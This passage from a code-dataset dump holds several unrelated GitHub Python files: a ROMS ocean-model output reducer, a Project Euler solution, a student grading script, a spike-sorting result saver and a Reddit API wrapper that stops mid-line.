else:\n            f.write('0')\n            f.close()\n            return \"Sorry...\" + render_template('end.html')\n\n\nif __name__ == '__main__':\n    # Run the server\n    app.run(debug = True, host='0.0.0.0', port=5003)\n","repo_name":"YeRyeongLee/cat_or_dog","sub_path":"3_end/server3.py","file_name":"server3.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28830861754","text":"#!/usr/bin/python3\r\n# -*- coding: utf-8 -*-\r\n# File: mes_modules_path.py\r\n# Author: Marc COATANHAY\r\n\r\n\"\"\"\r\n    Add the path required to import personal modules.\r\n\"\"\"\r\n\r\n# Import modules\r\nimport sys\r\n\r\n# Constant and global variable definitions\r\nrepertoire = 'C:\\\\Users\\\\MC\\\\Documents\\\\Python\\\\Mes_modules'\r\nsys.path.append(repertoire)\r\nprint('* Mes modules path :', repertoire, '/ok')","repo_name":"mcoatanhay/dornicalc","sub_path":"mes_modules_path.py","file_name":"mes_modules_path.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28944600448","text":"class Student:\r\n    def __init__(self,id,name,mid1_marks,mid2_marks,quiz_marks):\r\n        self.id=id\r\n        self.name=name\r\n        self.mid1_marks=mid1_marks\r\n        self.mid2_marks=mid2_marks\r\n        self.quiz_marks=quiz_marks\r\n    def info(self):\r\n        print(\"ID:\",self.id)\r\n        print(\"name:\",self.name)\r\n        print(\"mid1_marks:\", self.mid1_marks)\r\n        print(\"mid2_marks:\", self.mid2_marks)\r\n        print(\"quiz_marks:\", self.quiz_marks)\r\n    def total(self):\r\n        total=self.mid1_marks+self.mid2_marks+self.quiz_marks\r\n        print(\"TOTAL:\",total)\r\n        if(total>=80):\r\n            print(\"A GRADE\")\r\n        elif(total<80 and total>=60):\r\n            print(\"B GRADE\")\r\n        elif(total>=50 and total<60):\r\n            print(\"C GRADE\")\r\nx=Student(11012,\"ARUN\",10,10,30)\r\nx.info()\r\nx.total()\r\n","repo_name":"PerlaVenkataArunKumar/Python-codes","sub_path":"Python/idle problems/65.py","file_name":"65.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15550361456","text":"\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 18 16:56:38 2023\n\n@author: thorbjornostenbymoe\n\"\"\"\n\"\"\"\nScript for reducing size of output file, can surely be solved in the supercomputer \nwith nc.dump, but this gives a lot of choices....\n\nInterpolation from u and v points to rho points should probably be done in the horizontal\nregion part of the script :)\n\"\"\"\n\n###############################################################################\n################################# - Packages - ################################\n###############################################################################\n\nimport numpy as np\nimport netCDF4 as nc\n\n###############################################################################\n############################### - User options - ##############################\n###############################################################################\n\"\"\" NB - nothing outside of user options should have to be changed unless a new variable is added\"\"\"\n\n# file path - split up to fit with writing of new file\nMain_path = '/Users/thorbjornostenbymoe/Desktop/Initialization_of_model/MODEL_SETUP/NEW_OUTPUT_HHH'\nExperiment = '/MOD/pNIIC_NIJ/'\nFilename = 'roms_avg_0004.nc.nosync'\n\nds = nc.Dataset(Main_path+Experiment+Filename)\n\n#original 
dimensions\nOrig_t = np.shape(ds['temp'])[0]\nOrig_z = np.shape(ds['temp'])[1]\nOrig_x = np.shape(ds['temp'])[2]\nOrig_y = np.shape(ds['temp'])[3]\n\n# Print dimensions along the way?\nPrintDim = 1\n\n#Variables to include (1 = include)\nincl_Temp = 1        # Temperature\nincl_Salt = 1        # Salinity\nincl_Uvel = 1        # Zonal velocity\nincl_Vvel = 1        # Meridional Velocity\nincl_Ubar = 1        # Depth-integrated zonal velocity\nincl_Vbar = 1        # Depth-integrated meridional velocity\nincl_Zeta = 1        # Sea surface height\nincl_Wvel = 1        # Vertical Velocity\nincl_Omeg = 1        # Vertical momentum\nincl_shfx = 1        # surface heat flux\nincl_ssfx = 1        # surface salt flux\nonly_time_3D = 0     # Only do horizontal averages for 4D variables, 3D variables are only treated in time \n# if new variables are desired, simply add here and below according to dimension of variable\n\n#recommended to always include\nincl_Cs_r = 1        # rho-coordinate stretching\nincl_Cs_w = 1        # W-coordinate stretching\nincl_dept = 1        # depth array\n\n# Time averages?\nTime_avg = 0         # 1 = time average\nTime_a_start = 6     # When does the time average start? (month) \nTime_a_end = 12      # When does the time average end? (month)\n\n# Specific period? \n# (If only one time-step is desired, simply set Time_p_start = Time_p_end)\nTime_per = 1         # 1 = specific period\nTime_p_start = 6     # When does the time period start? (month) \nTime_p_end = 12      # When does the time period end? (month)\ntime_p_dim = Time_p_end - Time_p_start #dimension of newly defined period\n\n\n# Horizontal average? \nHoriz_avg = 0        # 1 = Horizontal average\nHoriz_avg_d = 'x'    # 'x' = zonal average, 'y' = meridional average\nHoriz_avg_s = 125    # Where does the horizontal average start?\nHoriz_avg_e = 175    # Where does the horizontal average end?\nHoriz_avg_dim = Horiz_avg_e - Horiz_avg_s\n\n# Horizontal region? 
(retains only a specified region)\nHoriz_reg = 1 # 1 = Horizontal average\nHoriz_reg_both = 1 # 1 = average over both dims\nHoriz_reg_dim = 'y' # 'x' = zonal average, 'y' = meridional average\n# 1 is for zonal \nHoriz_reg_s1 = 125 # Where does the horizontal region start?\nHoriz_reg_e1 = 175 # Where does the horizontal region end?\nHoriz_reg_dim1 = Horiz_reg_e1 - Horiz_reg_s1\n# 2 is for meridional \nHoriz_reg_s2 = 100 # Where does the horizontal region start?\nHoriz_reg_e2 = 200 # Where does the horizontal region end?\nHoriz_reg_dim2 = Horiz_reg_e2 - Horiz_reg_s2\n\n###############################################################################\n################################ - Functions - ################################\n###############################################################################\n\n#function to get desired data, should work for all dimensions and output (as long as the dimension is 3D or 4D)\ndef get_avgs_4D(VARIABLE,name,counter):\n orig_z = np.shape(VARIABLE)[1] #original dimensions\n orig_x = np.shape(VARIABLE)[2]\n orig_y = np.shape(VARIABLE)[3]\n \n ###################### - TIME - ######################\n if Time_avg == 1: # if user wants a time average, start and end is defined in 'User Options'\n VARIABLE = np.array([np.nanmean(VARIABLE[Time_a_start:Time_a_end,:,:,:],axis=0)]) # np.array to fit NetCDF file\n tdim = 1\n \n elif Time_per == 1: # if user wants a certain time period, start and end is defined in 'User Options'\n if Time_p_start == Time_p_end: # if start = end, only one timestep is retrieved\n VARIABLE = np.array([VARIABLE[Time_p_start,:,:,:]])\n tdim = 1\n \n else: # else a time period is chosen\n VARIABLE = VARIABLE[Time_p_start:Time_p_end,:,:,:]\n tdim = time_p_dim\n \n else: #get full data period\n VARIABLE = VARIABLE\n tdim = Orig_t\n \n ###################### - SPACE - ######################\n if Horiz_avg == 1: # retrieve horizontal transect averaged over chosen extent, zonal or meridional\n if Horiz_avg_d == 'x': # zonal average\n VARIABLE = np.reshape(np.array([np.nanmean(VARIABLE[:,:,Horiz_avg_s:Horiz_avg_e,:],axis=2)]),newshape=[tdim,orig_z,1,orig_y]) # Reshape to fit NetCDF file\n elif Horiz_avg_d == 'y': # meridional average \n VARIABLE = np.reshape(np.array([np.nanmean(VARIABLE[:,:,:,Horiz_avg_s:Horiz_avg_e],axis=3)]),newshape=[tdim,orig_z,orig_x,1]) # Reshape to fit NetCDF file\n\n elif Horiz_reg == 1: # retrieve only a chosen region of the domain, could be used to for instance exclude nudging regions\n if Horiz_reg_both == 1: # both zonal and meridional selected region\n VARIABLE = VARIABLE[:,:,Horiz_reg_s1:Horiz_reg_e1,Horiz_reg_s2:Horiz_reg_e2]\n else:\n if Horiz_reg_dim == 'x': # only zonal region\n VARIABLE = VARIABLE[:,:,Horiz_reg_s1:Horiz_reg_e1,:]\n if Horiz_reg_dim == 'y': # only meridional region\n VARIABLE = VARIABLE[:,:,:,Horiz_reg_s2:Horiz_reg_e2]\n \n if PrintDim == 1: #print dimension\n print(str(counter)+'. 
'+name+'(t,z,x,y): '+str(np.shape(VARIABLE)))\n counter = counter + 1\n return VARIABLE,counter\n\n# same as last function for 3D variables\ndef get_avgs_3D(VARIABLE,name,counter):\n orig_x = np.shape(VARIABLE)[1]\n orig_y = np.shape(VARIABLE)[2]\n if Time_avg == 1:\n VARIABLE = np.array([np.nanmean(VARIABLE[Time_a_start:Time_a_end,:,:],axis=0)])\n tdim = 1\n elif Time_per == 1:\n if Time_p_start == Time_p_end: \n VARIABLE = np.array([VARIABLE[Time_p_start,:,:]])\n tdim = 1\n else:\n VARIABLE = VARIABLE[Time_p_start:Time_p_end,:,:]\n tdim = time_p_dim\n else:\n VARIABLE = VARIABLE\n tdim = Orig_t\n\n #space\n if Horiz_avg == 1:\n if Horiz_avg_d == 'x':\n VARIABLE = np.reshape(np.array([np.nanmean(VARIABLE[:,Horiz_avg_s:Horiz_avg_e,:],axis=1)]),newshape=[tdim,1,orig_y])\n elif Horiz_avg_d == 'y':\n VARIABLE = np.reshape(np.array([np.nanmean(VARIABLE[:,:,Horiz_avg_s:Horiz_avg_e],axis=2)]),newshape=[tdim,orig_x,1])\n\n elif Horiz_reg == 1:\n if Horiz_reg_both == 1:\n VARIABLE = VARIABLE[:,Horiz_reg_s1:Horiz_reg_e1,Horiz_reg_s2:Horiz_reg_e2]\n else:\n if Horiz_reg_dim == 'x':\n VARIABLE = VARIABLE[:,Horiz_reg_s1:Horiz_reg_e1,:]\n if Horiz_reg_dim == 'y':\n VARIABLE = VARIABLE[:,:,Horiz_reg_s2:Horiz_reg_e2]\n \n if PrintDim == 1:\n print(str(counter)+'. '+name+'(t,x,y): '+str(np.shape(VARIABLE)))\n counter = counter + 1\n return VARIABLE,counter\n\n\ndef get_avgs_3D_time(VARIABLE,name,counter): # same as previous but only for time\n if Time_avg == 1:\n VARIABLE = np.array([np.nanmean(VARIABLE[Time_a_start:Time_a_end,:,:],axis=0)])\n elif Time_per == 1:\n if Time_p_start == Time_p_end: \n VARIABLE = np.array([VARIABLE[Time_p_start,:,:]])\n else:\n VARIABLE = VARIABLE[Time_p_start:Time_p_end,:,:]\n else:\n VARIABLE = VARIABLE\n \n if PrintDim == 1:\n print(str(counter)+'. 
'+name+'(t,x,y): '+str(np.shape(VARIABLE)))\n counter = counter + 1\n return VARIABLE,counter\n\n\n###############################################################################\n################################### - file - ##################################\n###############################################################################\n\npath_string = Main_path+Experiment+'Reduced_'+Filename\nncid = nc.Dataset(path_string,mode='w',format='NETCDF4')\nncid.description = 'Reduced output of file: '+Main_path+Experiment+Filename\nncid.author = 'Thorbjoern Oestenby Moe'\n\n###############################################################################\n############################# - Set dimensions - ##############################\n###############################################################################\n\n# Original dimensions \n# Time\ntdim = Orig_t\n# Depth\nz1 = ds['Cs_r'][:].shape[0]\nz2 = ds['Cs_w'][:].shape[0]\n# Horizontal\nx1 = ds['v'][:].shape[2]\nx2 = ds['u'][:].shape[2]\ny1 = ds['u'][:].shape[3]\ny2 = ds['v'][:].shape[3]\n# Dim to use if a dimension is averaged over (to keep the shape constant)\ndim0 = 1\n\n# Setting dimensions of NetCDF file according to the desired data structure\n# This means keeping the original dimensions for variables or dimensions not changed\n# and reducing dimensions when neccessary\n\nif Time_avg == 1 or Time_p_start == Time_p_end:\n tdim = dim0\nelif Time_per == 1:\n tdim = time_p_dim\nelse:\n tdim = Orig_t\n\nif Horiz_avg == 1 and Horiz_avg_d == 'y':\n x1 = x1\n x2 = x2\n y1 = dim0\n y2 = dim0\n \nelif Horiz_avg == 1 and Horiz_avg_d == 'x':\n x1 = dim0\n x2 = dim0\n y1 = y1\n y2 = y2 \n\nelif Horiz_reg == 1 and Horiz_reg_both == 0 and Horiz_reg_dim == 'y':\n x1 = x1\n x2 = x2\n y1 = Horiz_reg_dim2\n y2 = Horiz_reg_dim2\n \nelif Horiz_reg == 1 and Horiz_reg_both == 0 and Horiz_reg_dim == 'x':\n x1 = Horiz_reg_dim1\n x2 = Horiz_reg_dim1\n y1 = y1\n y2 = y2\n\nelif Horiz_reg == 1 and Horiz_reg_both == 1:\n x1 = Horiz_reg_dim1\n x2 = Horiz_reg_dim1\n y1 = Horiz_reg_dim2\n y2 = Horiz_reg_dim2\n \n###############################################################################\n############################# - Make dimensions - #############################\n###############################################################################\n \ndt = ncid.createDimension('dt', tdim)\ndz1 = ncid.createDimension('dz1', z1)\ndz2 = ncid.createDimension('dz2', z2)\ndx1 = ncid.createDimension('dx1', x1)\ndx2 = ncid.createDimension('dx2', x2)\ndy1 = ncid.createDimension('dy1', y1)\ndy2 = ncid.createDimension('dy2', y2)\n\nhdx = ncid.createDimension('hdx', 268)\nhdy = ncid.createDimension('hdy', 402) \n\nif only_time_3D == 1:\n x3 = ds['v'][:].shape[2]\n x4 = ds['u'][:].shape[2]\n y3 = ds['u'][:].shape[3]\n y4 = ds['v'][:].shape[3]\n \n dx3 = ncid.createDimension('dx3', x3)\n dx4 = ncid.createDimension('dx4', x4)\n dy3 = ncid.createDimension('dy3', y3)\n dy4 = ncid.createDimension('dy4', y4)\n\n###############################################################################\n######### - Get data, average, define variable, and assign variable - #########\n###############################################################################\n\n#Template to add another variable:\n\"\"\"\n4D:\nif incl_NEW_VAR == 1:\n # Get data\n NEW_VAR_raw = ds['new_var'][:,:,:,:]\n # Make fields\n NEW_VAR,counter = get_avgs_4D(NEW_VAR_raw,'NEW_VAR short name',counter)\n \n # Create variable:\n #'dt': should be constant\n #'dz1': change to dz2 if variable is located on vertical w-point 
(e.g. W, omega,..) \n #'dx2': change to dx1 if variable is located on eta_vi-point\n #'dy2': change to dy1 if variable is located on xi_u-point \n \n new_var = ncid.createVariable('new_var','f8',('dt','dz1','dx2','dy2',))\n new_var.long_name = 'NEW_VAR long name'\n # Assign variable\n new_var[:,:,:,:] = NEW_VAR\n \n3D:\nif incl_NEW_VAR == 1:\n NEW_VAR_raw = ds['new_var'][:,:,:]\n \n if only_time_3D == 0:\n NEW_VAR,counter = get_avgs_3D(NEW_VAR_raw,NEW_VAR short name,counter) \n \n new_var = ncid.createVariable('new_var','f8',('dt','dx2','dy1',))\n new_var.long_name = 'NEW_VAR long name'\n new_var[:,:,:] = NEW_VAR\n \n elif only_time_3D == 1:\n NEW_VAR,counter = get_avgs_3D_time(NEW_VAR_raw,NEW_VAR short name,counter)\n \n new_var = ncid.createVariable('new_var','f8',('dt','dx4','dy3',))\n new_var.long_name = 'NEW_VAR long name'\n new_var[:,:,:] = NEW_VAR\n\"\"\"\n\nif PrintDim == 1:\n print('#####################################################################')\n print('################ - Variables included & dimension - #################')\n print('##################################################################### \\n')\ncounter = 1\nif incl_Temp == 1:\n # Get data\n TEMP_raw = ds['temp'][:,:,:,:]\n # Make fields\n TEMP,counter = get_avgs_4D(TEMP_raw,'T',counter)\n \n # Create variable\n temp = ncid.createVariable('temp','f8',('dt','dz1','dx2','dy2',))\n temp.long_name = 'Temperature'\n # Assign variable\n temp[:,:,:,:] = TEMP\n \nif incl_Salt == 1: #same comments for all others\n SALT_raw = ds['salt'][:,:,:,:]\n SALT,counter = get_avgs_4D(SALT_raw,'S',counter)\n \n salt = ncid.createVariable('salt','f8',('dt','dz1','dx2','dy2',))\n salt.long_name = 'Salinity'\n salt[:,:,:,:] = SALT\n \n \nif incl_Uvel == 1:\n UVEL_raw = ds['u'][:,:,:,:]\n UVEL,counter = get_avgs_4D(UVEL_raw,'u',counter)\n \n u = ncid.createVariable('u','f8',('dt','dz1','dx2','dy1',))\n u.long_name = 'Zonal Velocity'\n u[:,:,:,:] = UVEL\n\nif incl_Vvel == 1:\n VVEL_raw = ds['v'][:,:,:,:]\n VVEL,counter = get_avgs_4D(VVEL_raw,'v',counter)\n \n v = ncid.createVariable('v','f8',('dt','dz1','dx1','dy2',))\n v.long_name = 'Meridional Velocity'\n v[:,:,:,:] = VVEL\n \nif incl_Wvel == 1:\n WVEL_raw = ds['w'][:,:,:,:]\n WVEL,counter = get_avgs_4D(WVEL_raw,'w',counter)\n \n w = ncid.createVariable('w','f8',('dt','dz2','dx2','dy2',))\n w.long_name = 'Vertical Velocity'\n w[:,:,:,:] = WVEL\n \nif incl_Omeg == 1:\n OMEG_raw = ds['omega'][:,:,:,:]\n OMEG,counter = get_avgs_4D(OMEG_raw,'ω',counter)\n \n omega = ncid.createVariable('omega','f8',('dt','dz2','dx2','dy2',))\n omega.long_name = 'Vertical Momentum'\n omega[:,:,:,:] = OMEG\n\nif incl_Ubar == 1:\n UBAR_raw = ds['ubar'][:,:,:]\n \n if only_time_3D == 0:\n UBAR,counter = get_avgs_3D(UBAR_raw,u'u\\u0305',counter) \n \n ubar = ncid.createVariable('ubar','f8',('dt','dx2','dy1',))\n ubar.long_name = 'Depth-Integrated Zonal Velocity'\n ubar[:,:,:] = UBAR\n \n elif only_time_3D == 1:\n UBAR,counter = get_avgs_3D_time(UBAR_raw,u'u\\u0305',counter)\n \n ubar = ncid.createVariable('ubar','f8',('dt','dx4','dy3',))\n ubar.long_name = 'Depth-Integrated Zonal Velocity'\n ubar[:,:,:] = UBAR\n \nif incl_Vbar == 1:\n VBAR_raw = ds['vbar'][:,:,:]\n \n if only_time_3D == 0:\n VBAR,counter = get_avgs_3D(VBAR_raw,u'v\\u0305',counter) \n \n vbar = ncid.createVariable('vbar','f8',('dt','dx1','dy2',))\n vbar.long_name = 'Depth-Integrated Meridional Velocity'\n vbar[:,:,:] = VBAR\n \n elif only_time_3D == 1: \n VBAR,counter = get_avgs_3D_time(VBAR_raw,u'v\\u0305',counter) \n \n vbar = 
ncid.createVariable('vbar','f8',('dt','dx3','dy4',))\n vbar.long_name = 'Depth-Integrated Meridional Velocity'\n vbar[:,:,:] = VBAR\n \nif incl_Zeta == 1:\n ZETA_raw = ds['zeta'][:,:,:]\n \n if only_time_3D == 0:\n ZETA,counter = get_avgs_3D(ZETA_raw,'η',counter) \n \n zeta = ncid.createVariable('zeta','f8',('dt','dx2','dy2',))\n zeta.long_name = 'Sea Surface Elevation'\n zeta[:,:,:] = ZETA\n \n elif only_time_3D == 1: \n ZETA,counter = get_avgs_3D_time(ZETA_raw,'η',counter) \n \n zeta = ncid.createVariable('zeta','f8',('dt','dx4','dy4',))\n zeta.long_name = 'Sea Surface Elevation'\n zeta[:,:,:] = ZETA\n \nif incl_shfx == 1:\n SHFX_raw = ds['shflux'][:,:,:]\n \n if only_time_3D == 0:\n SHFX,counter = get_avgs_3D(SHFX_raw,'dQ',counter)\n \n shflux = ncid.createVariable('shflux','f8',('dt','dx2','dy2',))\n shflux.long_name = 'heat flux'\n shflux[:,:,:] = SHFX\n \n elif only_time_3D == 1:\n SHFX,counter = get_avgs_3D_time(SHFX_raw,'dQ',counter)\n \n shflux = ncid.createVariable('shflux','f8',('dt','dx4','dy4',))\n shflux.long_name = 'heat flux'\n shflux[:,:,:] = SHFX\n \nif incl_ssfx == 1:\n SSFX_raw = ds['ssflux'][:,:,:]\n if only_time_3D == 0:\n SSFX,counter = get_avgs_3D(SSFX_raw,'dS',counter) \n \n ssflux = ncid.createVariable('ssflux','f8',('dt','dx2','dy2',))\n ssflux.long_name = 'salt flux'\n ssflux[:,:,:] = SSFX\n \n elif only_time_3D == 1: \n SSFX,counter = get_avgs_3D_time(SSFX_raw,'dS',counter) \n \n ssflux = ncid.createVariable('ssflux','f8',('dt','dx4','dy4',))\n ssflux.long_name = 'salt flux'\n ssflux[:,:,:] = SSFX\n \nif incl_Cs_r == 1:\n Cs_r = ncid.createVariable('Cs_r','f8',('dz1',))\n Cs_r.long_name = 'stretching on rho points'\n Cs_r[:] = ds['Cs_r'][:]\n \n \nif incl_Cs_w == 1:\n Cs_w = ncid.createVariable('Cs_w','f8',('dz2',))\n Cs_w.long_name = 'stretching on w points'\n Cs_w[:] = ds['Cs_w'][:]\n\nif incl_dept == 1:\n h = ncid.createVariable('h','f8',('hdx','hdy',))\n h.long_name = 'bathymetry'\n h[:,:] = ds['h'][:,:]\n\n\nncid.close()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"thorbjornmoeUiB/ROMS_initialization","sub_path":"Scripts_for_Iceland_Ideal/ReduceOutput.py","file_name":"ReduceOutput.py","file_ext":"py","file_size_in_byte":19001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20752926369","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\nfrom spikeval.module import ModMetricFranke, ModuleExecutionError\nfrom .models.result import ResultFranke\n\n__author__ = \"pmeier82\"\n__all__ = [\"ModuleFranke\"]\n\n\ndef toint(val):\n # if type(val) == type(\"\"):\n res = int(float(val))\n return res\n\n\nclass ModuleFranke(ModMetricFranke):\n \"\"\"spikeval module for the franke metric\"\"\"\n\n # RESULT_TYPES\n # MRTable, # res_table - this is what we will save!\n # MRTable, # similarity_matrix\n # MRTable, # shift_matrix\n # MRTable, # sp.atleast_2d(delta_shift)\n # MRDict, # alignment\n # MRDict, # O\n # MRTable, # spike_no_assignment_matrix\n # MRDict, # EL\n # MRDict, # GL\n # MRTable, # sp.atleast_2d(TP)\n # MRTable, # sp.atleast_2d(TPO)\n # MRTable, # sp.atleast_2d(FPA)\n # MRTable, # sp.atleast_2d(FPAO)\n # MRTable, # sp.atleast_2d(FN)\n # MRTable, # sp.atleast_2d(FNO)\n # MRTable, # sp.atleast_2d(FP)\n # MRTable, # sp.atleast_2d(u_k2f)\n # MRTable, # sp.atleast_2d(u_f2k)\n\n def save(self, mod, ana):\n \"\"\"save django result entities\"\"\"\n\n # check for results\n if self._stage != 3:\n raise ModuleExecutionError(\"save initiated when module was not finalised!\")\n\n # 
result saving\n for row in self.result[0].value:\n res_entity = ResultFranke(analysis=ana, module=mod)\n res_entity.unit_gt = row[0]\n res_entity.unit_an = row[1]\n res_entity.KS = toint(row[2])\n res_entity.KSO = toint(row[3])\n res_entity.FS = toint(row[4])\n res_entity.TP = toint(row[5])\n res_entity.TPO = toint(row[6])\n res_entity.FPA = toint(row[7])\n res_entity.FPAE = toint(row[8])\n res_entity.FPAO = toint(row[9])\n res_entity.FPAOE = toint(row[10])\n res_entity.FN = toint(row[11])\n res_entity.FNO = toint(row[12])\n res_entity.FP = toint(row[13])\n res_entity.save()\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"pmeier82-zz/django-spikeval-franke","sub_path":"djspikeval_franke/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18142800425","text":"#!/usr/bin/env python3\n\nimport collections\nimport functools\n\n\nDIGITS = tuple(range(10))\nDIGIT_COUNTS = collections.Counter(DIGITS) + collections.Counter(DIGITS)\nFACTORIAL = [1, 1, 2, 6, 24, 120, 720, 5040, 40320, 362880, 3628800]\n\n\n@functools.lru_cache(maxsize=None)\ndef multinomial(*args):\n n = sum(args)\n r = FACTORIAL[n]\n for k in args:\n r //= FACTORIAL[k]\n return r\n\n\n# even_digits are the digits occupying 10^0, 10^2, ..., 10^18.\ndef count_arrangements(even_digits):\n even_digit_counts = collections.Counter(even_digits)\n odd_digit_counts = DIGIT_COUNTS - even_digit_counts\n even_digit_arrangements = multinomial(*sorted(even_digit_counts.values()))\n odd_digit_arrangements = multinomial(*sorted(odd_digit_counts.values()))\n # The 10^19 digit can't be 0.\n if odd_digit_counts[0] > 0:\n odd_digit_counts[0] -= 1\n odd_digit_arrangements -= multinomial(*sorted(odd_digit_counts.values()))\n return even_digit_arrangements * odd_digit_arrangements\n\n\ndef search(current_digits, current_sum, remaining_digit_count, target_sum, pool):\n if remaining_digit_count == 0:\n if current_sum == target_sum:\n return count_arrangements(current_digits)\n else:\n return 0\n if remaining_digit_count > len(pool) * 2:\n return 0\n d = pool[0]\n pool = pool[1:]\n result = search(\n current_digits, current_sum, remaining_digit_count, target_sum, pool\n )\n result += search(\n current_digits + [d],\n current_sum + d,\n remaining_digit_count - 1,\n target_sum,\n pool,\n )\n if remaining_digit_count > 1:\n result += search(\n current_digits + [d, d],\n current_sum + d * 2,\n remaining_digit_count - 2,\n target_sum,\n pool,\n )\n return result\n\n\ndef main():\n result = 0\n for even_digits_sum in (23, 34, 45, 56, 67):\n result += search([], 0, 10, even_digits_sum, DIGITS)\n print(result)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zmwangx/Project-Euler","sub_path":"491/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20230444869","text":"import json\nimport requests\nimport warnings\nfrom datetime import datetime, timedelta\nfrom collections.abc import Iterable\n\nfrom .containers import RedditPost\n\n\nclass RedditAPI(object):\n \"\"\"\n Simple wrapper for some Reddit API.\n See https://www.reddit.com/dev/api\n\n NOTE: If you're using this service outside the code in github.com/timberhill/reddy, please use your own API credentials.\n\n client_id, str: Reddit API client ID, optional\n\n secret, str: Reddit API client secret, optional\n \"\"\"\n 
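# the bearer token is fetched on construction and refreshed by verify_authentication when it expires\n    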
def __init__(self, client_id=None, secret=None):\n self._access_token = None\n self._access_token_deadline = None\n\n self.authenticate(client_id, secret)\n\n\n def _headers(self):\n header = { \"User-Agent\": \"python:reddy:v0.1 (by /u/timberhilly)\" }\n if self._access_token is not None:\n header[\"Authorization\"] = f\"bearer {self._access_token}\"\n\n return header\n\n\n def authenticate(self, client_id=None, secret=None, scope=\"read\"):\n \"\"\"\n OAuth2, see https://github.com/reddit-archive/reddit/wiki/OAuth2\n\n NOTE: If you're using this service outside the code in github.com/timberhill/reddy, please use your own API credentials.\n\n client_id, str: Reddit API client ID, optional\n\n secret, str: Reddit API client secret, optional\n\n scope, str: API scope, default: \"read\"\n \"\"\"\n if client_id is None or secret is None:\n from cryptography.fernet import Fernet\n with \\\n open(\"../modules/bin/62608e08adc29a8d6dbc9754e659f125\", \"rb\") as a, \\\n open(\"../modules/bin/3c6e0b8a9c15224a8228b9a98ca1531d\", \"rb\") as b, \\\n open(\"../modules/bin/5ebe2294ecd0e0f08eab7690d2a6ee69\", \"rb\") as c:\n f = Fernet(b.read()[4:-3])\n ab, cb = f.decrypt(a.read()[4:-3]), f.decrypt(c.read()[4:-3])\n \n # following this example:\n # https://github.com/reddit-archive/reddit/wiki/OAuth2-Python-Example\n client_id = client_id if client_id is not None else ab.decode(\"utf-8\")\n secret = secret if secret is not None else cb.decode(\"utf-8\")\n client_auth = requests.auth.HTTPBasicAuth(client_id, secret)\n post_data = {\n \"grant_type\": \"client_credentials\",\n \"user\": client_id, \n \"password\": secret, \n \"scope\": scope,\n \"redirect_uri\": \"https://github.com/timberhill/reddy\"\n }\n\n response = requests.post(\n \"https://ssl.reddit.com/api/v1/access_token\",\n auth=client_auth,\n data=post_data,\n headers=self._headers()\n )\n \n response_dictionary = json.loads(response.content)\n if \"access_token\" in response_dictionary:\n self._access_token = response_dictionary[\"access_token\"]\n self._access_token_deadline = \\\n datetime.utcnow() \\\n + timedelta(seconds=response_dictionary[\"expires_in\"])\n else:\n raise KeyError(\"'access_token' was not returned by the server.\")\n\n\n def verify_authentication(self):\n time_now = datetime.utcnow()\n if time_now >= self._access_token_deadline:\n # token expired, get a new one\n self.authenticate()\n\n\n def _validate_paging_arguments(self, before, after, limit):\n if before is not None and after is not None:\n raise ValueError(\"Please specify either 'before' or 'after', not both.\")\n\n if limit < 1:\n warnings.warn(f\"Silly value encountered in parameter 'limit' ({limit}), setting it to 1.\")\n limit = 1\n \n if limit > 100:\n warnings.warn(f\"Reddit API does not return more than 100 posts, but 'limit' was set to {limit}, using value of 100 instead.\")\n limit = 100\n \n return before, after, limit\n\n\n def new_posts(self, subreddit, limit=100, before=None, after=None, count=None):\n \"\"\"\n Returns posts sorted by new.\n\n subreddit, str: name of the subreddit.\n\n before, str: ID of the previous page\n\n after, str: ID of the next page\n\n limit, int: number of posts to return (1-100)\n \"\"\"\n self.verify_authentication()\n before, after, limit = self._validate_paging_arguments(before, after, limit)\n base_url = f\"https://oauth.reddit.com/r/{subreddit}/new\"\n \n response = requests.get(base_url, dict(\n before=before,\n after=after,\n limit=limit,\n count=count,\n ), headers=self._headers())\n\n response.raise_for_status()\n 
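# Reddit listing payloads nest posts under data -> children, with the paging cursors alongside them\n        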
response_dictionary = json.loads(response.content)\n posts = [RedditPost.from_json(post[\"data\"]) for post in response_dictionary[\"data\"][\"children\"]]\n \n return posts, response_dictionary[\"data\"][\"before\"], response_dictionary[\"data\"][\"after\"]\n\n\n def search(self, subreddit, query, limit=100, before=None, after=None, count=None):\n \"\"\"\n Search API client.\n\n Can be used to load all posts in a subreddit that match a search query.\n\n subreddit, str: name of the subreddit.\n\n query, str: search query\n\n before, str: ID of the previous page\n\n after, str: ID of the next page\n\n limit, int: number of posts to return (1-100)\n \"\"\"\n self.verify_authentication()\n before, after, limit = self._validate_paging_arguments(before, after, limit)\n base_url = f\"https://oauth.reddit.com/r/{subreddit}/search\"\n \n response = requests.get(base_url, dict(\n q=query,\n sort=\"new\",\n syntax=\"cloudsearch\",\n t=\"all\",\n raw_json=1,\n before=before,\n after=after,\n limit=limit,\n count=count,\n ), headers=self._headers())\n\n response.raise_for_status()\n response_dictionary = json.loads(response.content)\n posts = [RedditPost.from_json(post[\"data\"]) for post in response_dictionary[\"data\"][\"children\"]]\n return posts, before, after\n \n\n def info(self, subreddit, item, url=None):\n \"\"\"\n Retrieve info on a post/comment/subreddit, see https://www.reddit.com/dev/api/#GET_api_info\n\n Fullnames info: https://www.reddit.com/dev/api/#fullnames (posts start with 't3_')\n\n subreddit, str: name of the subreddit.\n\n item, str/list: a comma-separated list of thing fullnames\n\n url, str: a valid URL\n \"\"\"\n self.verify_authentication()\n \n if isinstance(item, Iterable) and not isinstance(item, str): # a str is 